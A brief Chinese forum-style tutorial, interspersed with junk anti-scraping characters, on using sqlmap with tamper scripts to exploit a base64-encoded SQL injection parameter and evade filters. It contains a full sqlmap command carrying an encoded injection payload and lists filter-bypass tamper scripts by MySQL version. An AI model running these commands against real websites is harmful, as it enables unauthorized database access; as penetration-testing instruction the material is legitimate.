WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?# M1 {& n7 B# F% l
c- i( f2 {9 H J9 [
sqlmap的tamper里有个base64encode.py
3 f& F' `6 r2 x i. W$ ^8 p9 K
4 @4 w8 O% t% o4 C9 w: A7 x3 H# F使用如下" I, a$ f7 ?- ~" t8 k: Q/ E
% y% Q- H- F' I q/ V0 n
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
0 S) M9 l3 a }( E8 ?. v& F, e
" w, x$ a s: s. J1 y2 _$ g5 O& r0 x$ q+ C* o2 Q" P* x
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”1 N8 i5 b$ \) U; Z) X% _
9 v0 c/ T# }5 L; m' z4 ^! g( {
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
( R. ]/ L: a* B* i1 n8 d
' w9 ^" e0 v) a" L3 K& T& ]space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
* `8 `3 ?6 y5 a* Mspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
3 H! ^- E7 t: v# e首先确定目标数据库版本,然后选择相应的脚本。6 T& ^& b+ M; z) }1 a( G
-v 3 --batch --tamper "space2hash.py"
( B1 P: D7 L0 v4 B, K5 Z& f* U+ j! \7 ?
还有其他一些插件:
* Z3 }! A1 I; M% J1 O* J4 t' xencodes编码 ——charencode.py. J7 D: `. ]/ Y6 t$ u4 [
base64编码 —— base64encode.py# m* t8 T: J9 K! K( X( g& V# \
替换空格和关键字 —— halfversionedmorekeywords.py0 q7 ?& |/ q5 a: b- b
| U' [3 H4 h2 ?( N) ~9 F2 O
& V" p# v# H5 I6 a* V
! |( r# e/ r/ A2 ^
, m' M3 V* k: N' d |